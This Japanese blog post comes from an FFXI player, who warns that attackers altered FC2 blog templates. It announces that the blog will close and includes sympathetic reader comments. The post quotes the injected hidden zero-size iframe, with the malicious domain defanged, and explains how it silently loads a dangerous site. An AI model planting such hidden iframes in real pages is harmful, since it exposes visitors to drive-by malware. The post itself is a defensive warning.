

取り急ぎ:テンプレート改竄の件:続報

警告!

FC2の有名ブログで、第三者にテンプレートが改竄され、
怪しげなサイトへのリンクが埋め込まれるという被害があったそうです。

管理者の知らないうちに、テンプレートの中に
<iframe src=http://www■dda3■net width=0 height=0></iframe>
というインラインフレームが追加されていたとか・・・。

インラインフレームとは、本文内の好きな場所に指定したサイズの窓を作り、
その中に別のページを表示できるのですが、これを悪用されてしまったようです。
width=0 height=0(高さと幅が0)ということは、
ブログ内ではフレームが見えないわけですが、表示されていないというだけで、
ブログを開いた際に勝手に http://www■dda3■net へアクセスしてしまうので、
自分の知らない間に危険なサイトを覗いてしまうということに・・・。

・詳しい内容、対処法については こちらのサイトでご確認下さい↓

  ■FFXI Virus問題 まとめサイト

3/12追記:
FFXI:戦士スキー様のブログで再び、テンプレートが改竄されるという事が起きたそうです。
当ブログからリンクを貼っていたので削除致しました。
リンク先へ飛ばれた方はご注意下さい。
今回は対策の進んでいる方もいらっしゃるとは思いますが、もう一度確認をよろしくお願い致します。


1度目の被害の後に、こうもやすやすと侵入を許してしまうのは
個人の落ち度だけとは考えにくいです。
2度目の被害にあっている方が複数いらっしゃるようですし・・・。

私自身が被害にあったわけでもないので、今行動するのは過剰反応かなとは思いつつも、
FC2からの対応がないことや、原因が解明されていないことを思うと
このままFC2で続けていくわけにはいかないと考えており
今月中に閉鎖する流れで考えています。
その間に解決してくれるといいんですけどねぇ。
閉鎖にあたり、TBP等のリンクも全て外しました。リンクして下さった方、申し訳ありません。

閉鎖後、他のブログへ引越しして再出発するか、そのまま止めるか
まだどうするか決めていませんが、
月末までには決めるつもりなので、その時はご報告致します。

この記事のトラックバックURL

http://lazylady.blog8.fc2.com/tb.php/378-3d6c9223

コメント


なんとも物騒で嫌な話で落ち込む~。
こうゆう事でブログやる人減っちゃうのはすごく悲しい
色々事情あるけどお互い頑張って続けていきたいね~
としみじみ思うのですよ。ほんと。

何だか嫌な事が続くねぇ・・ この事でブログ書く人が減ったり最悪ヴァナ辞めたりする人が増えそうで(iдi) ブログ見るだけで応援する事しか出来ないのが悲しいよ・・

うむむぅ、こんな事態に。
私も考えなくちゃかしら……。

淋しく思いますが、来訪者のことを考えての英断ですね。
またどこかでさらにゃんの作品と出会えますことを祈っています。
ココは閉鎖ということで、ひとまずお疲れ様でした!

あう;; 残念です……(´;ω;`)
ブログもこれだけ中身がつまっていたら一財産だと思うのに……ほんとに悪徳業者は許せません!
娯楽と癒しの場であるはずのものが負担になるのでは何の意味もないので、無理はいえないですが、このブログの1ファンとしては、また別の形ででも再会できたらと思います。

この鬱憤は、とりあえずヴァナのモンスに八つ当たりでぶつけましょ!ヽ(`Д´)ノ

さらのブログは、身内だからどうこうじゃなくて、素直に楽しい。
閉鎖するということは、もう見られなくなってしまうのかと思うと、寂しい限り(>_<)
お引越しして転載するとしても膨大な量だから、転載ってわけにもいかないだろうしね、もう読めなくなるのか。。。寂しくなるねぇ。

またどこかで、再開してくれることを心待ちにしているよ('∇')

■teoさん
こういうことが続くと本当に嫌な気持ちになりますなぁ。
とりあえずFC2からは撤退することに決めたので、近いうちに閉鎖になります。
他のブログサイトへ移転しようかと思ったけど、どこも罠サイトがあったりで、安全とは言えないのが、なんとも・・・。

■あぷさん
ちょっと更新意欲は薄れてきてしまいますねえ。
せっかくVUで、やること増えたなーと思ってたのに。
VU新情報とか、そういう餌で罠サイトに誘導するコメントも頻発してるみたいだし・・・。まいったな~

■とて。さん
今のところ被害にあったのは一部の方だけのようなので、やれ引越しだ!閉鎖だ!って行動を起こすのは、過剰反応かなーと思ったりはするんだけど、
FC2の管理体制を信用できなくなった以上、続けていけないんよね。また同じことが起きたら、閉鎖って決めてたから、その気持ちは変わってません。
引越しはまだ検討中だけどねw

■ぱとさん
ブログ更新をやめた時でも、過去ログは残しておけると思ってたんだけど、テンプレを改竄されるとなった今では、閉鎖か引越しするしかないのが残念です。
たまに、自分で読み返してみながら、昔を懐かしむこともあったりしたのでw

正直、罠コメント等の対処にもうんざりしてたところへテンプレのチェックも追加・・・なんて、やはり負担ですよね。体調が悪かったり、忙しいとそこまでマメにチェックできませんし・・・。
先日、ウィンミッションも進めたし、書くネタはいっぱいあったんだけどなぁ。3月末から4月中旬まで忙しいので、その期間の前後に移転させるかもしれません。その時はURLをお知らせしますねー

■莢さん
そう言って貰えると、続けてきた甲斐があったわ^^
引越しも考えてはみてるけど、どこに移っても、不安は残るのよねえ・・・。
それに、データが膨大で、過去ログを移すのも一苦労かも。
開始から3年ってことで区切りもいいし、閉鎖でもいいかなって考えたりもするのよ。
グリーやミクシィの方に移そうかとも思ったけど、カスタマイズできないしねぇ・・・。
いろいろ迷ってるところです~

お疲れ様。
いたちごっこってよく言われるけど■の対応は、やられっぱなしだね。
寝釣りの時のように2年ぐらい放置するんじゃねーのかと思ってしまう昨今。
ネットサーフィン用のPCを用意しろかぁームリポ

あらら^^;
お疲れ様です。
閉鎖する流れなんですね~^^;

ほんとこんなわけのわからないもののせいで
関係のないところが閉鎖してしまうのは悲しいことです(--;

自分は、一般の人よりほんの少し知識がある程度なのですが、
それでも色々考えて対応もしてますが
あまり知らない人が自分のブログに着ていただいたのに
そのせいでキケンな目にあってしまうのは心苦しいですものねぇ。

自分のブログのきっかけにもなり、そうでなくても個人的に楽しく拝見していて、
そしてこの前ひょんなことからやっとお話できた
さらさんの所だけに色々と思うところが、、、(つ_T

しかし、こればかりは難しいですよね~^^;

まさかこんな事態になっているとは…。
素敵なサイト様だけにすごく残念でなりません…。
しかし被害拡大を防ぐには、仕方のない決断なのかもしれませんね…。
趣味で楽しくやっていたいだけなのに…
本当に悔しい思いでいっぱいです。

またさらさんの素敵な作品が拝見できる日が来るように祈っています。

ひとまずお疲れ様でした;

おつかれさまでした
わたしはPS2を使用してるので、PCとはそれほど仲良しじゃありません。でも、PCに向かったら、とりあえずここを覗くことにしていました。

こんな心無い馬鹿げたことで寂しい思いをすることになるなんて!!悲しすぎ・・・

でも、またどこかで始めてくださいね
そんな悪い奴に負けちゃいけないんだっ!!

「またはじめたよ~~」って知らせを首を長くして、待っています    じゃ、ね

■Girouさん
FFをやるPCとネットサーフィン用のPCと分けた方がいいらしいですね。
でも、ぽんっとPCを買える余裕もないわけで。
自衛しつつ、やっていくしかないかなあ・・・。
自分のことだけで手一杯なので、ブログは閉鎖することになりました。
他のサイトでも改竄事件とか起きてますしね・・・。

■タマさん
FC2からの対応がない以上は、置いておけないんですよね。
潔癖というわけじゃないんですが、放っとけない性格なので・・・。
楽しみにしてくださって、ありがとうございました・゚・(ノД`)・゚・

■のいあさん
被害拡大を防ぐと言えば、聞こえはいいですが、対応に疲れただけだったりしますw
ウィルススキャン、アップデートなど自衛が必要なのは当たり前のことでしたが、FF系のサイトへのリスクの高さは異常ですね。
また落ち着いた頃に再開するかもしれませんが、今の状態では随分と先の話になりそうです。

■なっちゃん
PCを分ける云々は、以前使ってたPS2版に戻せばいい話なんだけど、ジラートまでしか持ってないんだよね。
買いなおしたところで、あと何年も遊ぶわけじゃないし、勿体ないかなと・・・。
とりあえず、ブログの方は閉鎖しておけば、私の心が休まると言う話です。ハイw
いつだったか、なっちゃんが気に入った過去記事を読み返したりしてくれてると言ってくれたこと、うれしかったです。過去ログを残しておきたかったけど、それも叶わずごめんなさい(´Д⊂

コメントする


管理者にだけ表示を許可する

Template Designed by DW99

